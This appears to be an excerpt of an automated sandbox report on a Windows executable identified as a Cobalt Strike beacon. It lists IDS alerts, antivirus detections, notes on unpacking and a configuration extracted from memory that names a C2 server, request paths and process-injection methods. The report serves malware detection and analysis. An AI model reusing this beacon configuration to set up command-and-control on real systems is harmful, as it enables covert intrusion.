          2025-01-03T02:53:37.833442+010020337131Targeted Malicious Activity was Detected192.168.2.45003842.192.3.170443TCP
          2025-01-03T02:53:39.651317+010020337131Targeted Malicious Activity was Detected192.168.2.45005242.192.3.170443TCP
          2025-01-03T02:53:41.471649+010020337131Targeted Malicious Activity was Detected192.168.2.45005742.192.3.170443TCP
          2025-01-03T02:53:43.342180+010020337131Targeted Malicious Activity was Detected192.168.2.45005842.192.3.170443TCP
          2025-01-03T02:53:45.176286+010020337131Targeted Malicious Activity was Detected192.168.2.45005942.192.3.170443TCP
          2025-01-03T02:53:47.019691+010020337131Targeted Malicious Activity was Detected192.168.2.45006042.192.3.170443TCP
          2025-01-03T02:53:49.065930+010020337131Targeted Malicious Activity was Detected192.168.2.45006142.192.3.170443TCP
          2025-01-03T02:53:50.724895+010020337131Targeted Malicious Activity was Detected192.168.2.45006242.192.3.170443TCP
          2025-01-03T02:53:56.804066+010020337131Targeted Malicious Activity was Detected192.168.2.45006442.192.3.170443TCP
          2025-01-03T02:53:58.618893+010020337131Targeted Malicious Activity was Detected192.168.2.45006542.192.3.170443TCP
          2025-01-03T02:54:00.505193+010020337131Targeted Malicious Activity was Detected192.168.2.45006642.192.3.170443TCP
          2025-01-03T02:54:02.375345+010020337131Targeted Malicious Activity was Detected192.168.2.45006742.192.3.170443TCP
          2025-01-03T02:54:04.199060+010020337131Targeted Malicious Activity was Detected192.168.2.45006842.192.3.170443TCP
          2025-01-03T02:54:06.236791+010020337131Targeted Malicious Activity was Detected192.168.2.45006942.192.3.170443TCP
          2025-01-03T02:54:08.278378+010020337131Targeted Malicious Activity was Detected192.168.2.45007042.192.3.170443TCP
          2025-01-03T02:54:10.286678+010020337131Targeted Malicious Activity was Detected192.168.2.45007142.192.3.170443TCP
          2025-01-03T02:54:12.337304+010020337131Targeted Malicious Activity was Detected192.168.2.45007242.192.3.170443TCP
          2025-01-03T02:54:14.294467+010020337131Targeted Malicious Activity was Detected192.168.2.45007342.192.3.170443TCP
          2025-01-03T02:54:16.293636+010020337131Targeted Malicious Activity was Detected192.168.2.45007442.192.3.170443TCP
          2025-01-03T02:54:18.673601+010020337131Targeted Malicious Activity was Detected192.168.2.45007542.192.3.170443TCP
          2025-01-03T02:54:20.554253+010020337131Targeted Malicious Activity was Detected192.168.2.45007642.192.3.170443TCP
          2025-01-03T02:54:22.428951+010020337131Targeted Malicious Activity was Detected192.168.2.45007742.192.3.170443TCP
          2025-01-03T02:54:24.478630+010020337131Targeted Malicious Activity was Detected192.168.2.45007842.192.3.170443TCP
          2025-01-03T02:54:26.381437+010020337131Targeted Malicious Activity was Detected192.168.2.45007942.192.3.170443TCP
          2025-01-03T02:54:28.232312+010020337131Targeted Malicious Activity was Detected192.168.2.45008042.192.3.170443TCP
          2025-01-03T02:54:30.311038+010020337131Targeted Malicious Activity was Detected192.168.2.45008142.192.3.170443TCP
          2025-01-03T02:54:32.257613+010020337131Targeted Malicious Activity was Detected192.168.2.45008242.192.3.170443TCP
          2025-01-03T02:54:34.075801+010020337131Targeted Malicious Activity was Detected192.168.2.45008342.192.3.170443TCP
          2025-01-03T02:54:36.307927+010020337131Targeted Malicious Activity was Detected192.168.2.45008442.192.3.170443TCP
          2025-01-03T02:54:38.260748+010020337131Targeted Malicious Activity was Detected192.168.2.45008542.192.3.170443TCP
          2025-01-03T02:54:40.043317+010020337131Targeted Malicious Activity was Detected192.168.2.45008642.192.3.170443TCP
          2025-01-03T02:54:41.984732+010020337131Targeted Malicious Activity was Detected192.168.2.45008742.192.3.170443TCP
          2025-01-03T02:54:43.955267+010020337131Targeted Malicious Activity was Detected192.168.2.45008842.192.3.170443TCP
          2025-01-03T02:54:45.911290+010020337131Targeted Malicious Activity was Detected192.168.2.45008942.192.3.170443TCP
          2025-01-03T02:54:48.044208+010020337131Targeted Malicious Activity was Detected192.168.2.45009042.192.3.170443TCP
          2025-01-03T02:54:49.881590+010020337131Targeted Malicious Activity was Detected192.168.2.45009142.192.3.170443TCP
          2025-01-03T02:54:51.888912+010020337131Targeted Malicious Activity was Detected192.168.2.45009242.192.3.170443TCP
          2025-01-03T02:54:53.979784+010020337131Targeted Malicious Activity was Detected192.168.2.45009342.192.3.170443TCP
          2025-01-03T02:54:55.945957+010020337131Targeted Malicious Activity was Detected192.168.2.45009442.192.3.170443TCP
          2025-01-03T02:54:57.851375+010020337131Targeted Malicious Activity was Detected192.168.2.45009542.192.3.170443TCP
          2025-01-03T02:54:59.879305+010020337131Targeted Malicious Activity was Detected192.168.2.45009642.192.3.170443TCP
          2025-01-03T02:55:01.744485+010020337131Targeted Malicious Activity was Detected192.168.2.45009742.192.3.170443TCP
          2025-01-03T02:55:03.601934+010020337131Targeted Malicious Activity was Detected192.168.2.45009842.192.3.170443TCP
          2025-01-03T02:55:05.496469+010020337131Targeted Malicious Activity was Detected192.168.2.45009942.192.3.170443TCP
          2025-01-03T02:55:07.339832+010020337131Targeted Malicious Activity was Detected192.168.2.45010042.192.3.170443TCP
          2025-01-03T02:55:09.200269+010020337131Targeted Malicious Activity was Detected192.168.2.45010142.192.3.170443TCP
          2025-01-03T02:55:11.302692+010020337131Targeted Malicious Activity was Detected192.168.2.45010242.192.3.170443TCP
          2025-01-03T02:55:13.185010+010020337131Targeted Malicious Activity was Detected192.168.2.45010342.192.3.170443TCP
          2025-01-03T02:55:15.197485+010020337131Targeted Malicious Activity was Detected192.168.2.45010442.192.3.170443TCP
          2025-01-03T02:55:17.011739+010020337131Targeted Malicious Activity was Detected192.168.2.45010542.192.3.170443TCP
          2025-01-03T02:55:18.855270+010020337131Targeted Malicious Activity was Detected192.168.2.45010642.192.3.170443TCP
          2025-01-03T02:55:20.722679+010020337131Targeted Malicious Activity was Detected192.168.2.45010742.192.3.170443TCP
          2025-01-03T02:55:22.543460+010020337131Targeted Malicious Activity was Detected192.168.2.45010842.192.3.170443TCP
          2025-01-03T02:55:24.446011+010020337131Targeted Malicious Activity was Detected192.168.2.45010942.192.3.170443TCP
          2025-01-03T02:55:26.268646+010020337131Targeted Malicious Activity was Detected192.168.2.45011042.192.3.170443TCP
          2025-01-03T02:55:28.099338+010020337131Targeted Malicious Activity was Detected192.168.2.45011142.192.3.170443TCP
          2025-01-03T02:55:29.944259+010020337131Targeted Malicious Activity was Detected192.168.2.45011242.192.3.170443TCP
          2025-01-03T02:55:31.762391+010020337131Targeted Malicious Activity was Detected192.168.2.45011342.192.3.170443TCP
          2025-01-03T02:55:33.614935+010020337131Targeted Malicious Activity was Detected192.168.2.45011442.192.3.170443TCP
          2025-01-03T02:55:35.425741+010020337131Targeted Malicious Activity was Detected192.168.2.45011542.192.3.170443TCP
          2025-01-03T02:55:37.313533+010020337131Targeted Malicious Activity was Detected192.168.2.45011642.192.3.170443TCP
          2025-01-03T02:55:39.187290+010020337131Targeted Malicious Activity was Detected192.168.2.45011742.192.3.170443TCP
          2025-01-03T02:55:41.079453+010020337131Targeted Malicious Activity was Detected192.168.2.45011842.192.3.170443TCP
          2025-01-03T02:55:43.031406+010020337131Targeted Malicious Activity was Detected192.168.2.45011942.192.3.170443TCP
          2025-01-03T02:55:44.973875+010020337131Targeted Malicious Activity was Detected192.168.2.45012042.192.3.170443TCP
          2025-01-03T02:55:46.804472+010020337131Targeted Malicious Activity was Detected192.168.2.45012142.192.3.170443TCP
          2025-01-03T02:55:48.701107+010020337131Targeted Malicious Activity was Detected192.168.2.45012242.192.3.170443TCP
          2025-01-03T02:55:50.593240+010020337131Targeted Malicious Activity was Detected192.168.2.45012342.192.3.170443TCP
          2025-01-03T02:55:52.501076+010020337131Targeted Malicious Activity was Detected192.168.2.45012442.192.3.170443TCP
          2025-01-03T02:55:54.409589+010020337131Targeted Malicious Activity was Detected192.168.2.45012542.192.3.170443TCP
          2025-01-03T02:55:56.241086+010020337131Targeted Malicious Activity was Detected192.168.2.45012642.192.3.170443TCP
          2025-01-03T02:55:58.541173+010020337131Targeted Malicious Activity was Detected192.168.2.45012742.192.3.170443TCP
          2025-01-03T02:56:00.376765+010020337131Targeted Malicious Activity was Detected192.168.2.45012842.192.3.170443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: yZah650lHL.exeAvira: detected
          Found malware configuration
          Source: 00000000.00000002.4113551688.00000000001A0000.00000020.00001000.00020000.00000000.sdmpMalware Configuration Extractor: CobaltStrike {"BeaconType": ["HTTPS"], "Port": 443, "SleepTime": 60000, "MaxGetSize": 1048576, "Jitter": 0, "C2Server": "42.192.3.170,/dpixel", "HttpPostUri": "/submit.php", "Malleable_C2_Instructions": [], "HttpGet_Verb": "GET", "HttpPost_Verb": "POST", "HttpPostChunk": 0, "Spawnto_x86": "%windir%\\syswow64\\rundll32.exe", "Spawnto_x64": "%windir%\\sysnative\\rundll32.exe", "CryptoScheme": 0, "Proxy_Behavior": "Use IE settings", "Watermark": 987654321, "bStageCleanup": "False", "bCFGCaution": "False", "KillDate": 0, "bProcInject_StartRWX": "True", "bProcInject_UseRWX": "True", "bProcInject_MinAllocSize": 0, "ProcInject_PrependAppend_x86": "Empty", "ProcInject_PrependAppend_x64": "Empty", "ProcInject_Execute": ["CreateThread", "SetThreadContext", "CreateRemoteThread", "RtlCreateUserThread"], "ProcInject_AllocationMethod": "VirtualAllocEx", "bUsesCookies": "True", "HostHeader": ""}
          Multi AV Scanner detection for submitted file
          Source: yZah650lHL.exeVirustotal: Detection: 80%Perma Link
          Source: yZah650lHL.exeReversingLabs: Detection: 86%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Machine Learning detection for sample
          Source: yZah650lHL.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_00661184 CryptAcquireContextA,CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,0_2_00661184
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_00692020 CryptGenRandom,0_2_00692020

          Compliance

          barindex
          Detected unpacking (creates a PE file in dynamic memory)
          Source: C:\Users\user\Desktop\yZah650lHL.exeUnpacked PE file: 0.2.yZah650lHL.exe.660000.2.unpack
          Source: unknownHTTPS traffic detected: 42.192.3.170:443 -> 192.168.2.4:49730 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 42.192.3.170:443 -> 192.168.2.4:50064 version: TLS 1.2
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_00679220 malloc,_snprintf,FindFirstFileA,free,malloc,_snprintf,free,FindNextFileA,FindClose,0_2_00679220
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 0_2_00671C30 malloc,GetCurrentDirectoryA,FindFirstFileA,GetLastError,free,free,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindNextFileA,FindClose,0_2_00671C30
          Source: C:\Users\user\Desktop\yZah650lHL.exeCode function: 4x nop then sub rsp, 28h0_2_00402314

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49750 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49736 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49734 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49760 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49751 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49763 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49758 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49767 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49740 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49753 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49731 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49762 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49737 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49755 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49761 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49759 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49738 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49735 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49749 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49733 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49732 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49756 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49747 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49748 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49730 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49757 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49752 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49754 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49764 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49745 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49794 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49780 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49769 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49844 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49918 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49765 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49832 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49856 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49930 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49865 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49892 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49993 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49957 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50016 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49905 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50030 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50071 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50087 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49879 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50060 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50083 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50074 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50108 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50065 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50086 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50072 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50104 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50117 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50090 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50095 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50075 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50098 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50058 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50005 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50100 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50069 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50057 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50109 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50059 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50119 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50064 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50080 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50127 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50125 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50084 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50052 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49819 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50082 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50081 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50070 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50118 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50091 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49945 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50126 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50113 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50105 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50066 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50106 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50128 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50122 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50096 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50099 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50103 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50079 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50101 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50067 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50115 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50110 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50123 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:49982 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50111 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50097 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50116 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50085 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50124 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50102 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50038 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50073 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50076 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50077 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50088 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50107 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50120 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50068 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50114 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50121 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50062 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50112 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50061 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50093 -> 42.192.3.170:443
          Source: Network trafficSuricata IDS: 2033713 - Severity 1 - ET MALWARE Cobalt Strike Beacon Observed : 192.168.2.4:50094 -> 42.192.3.170:443
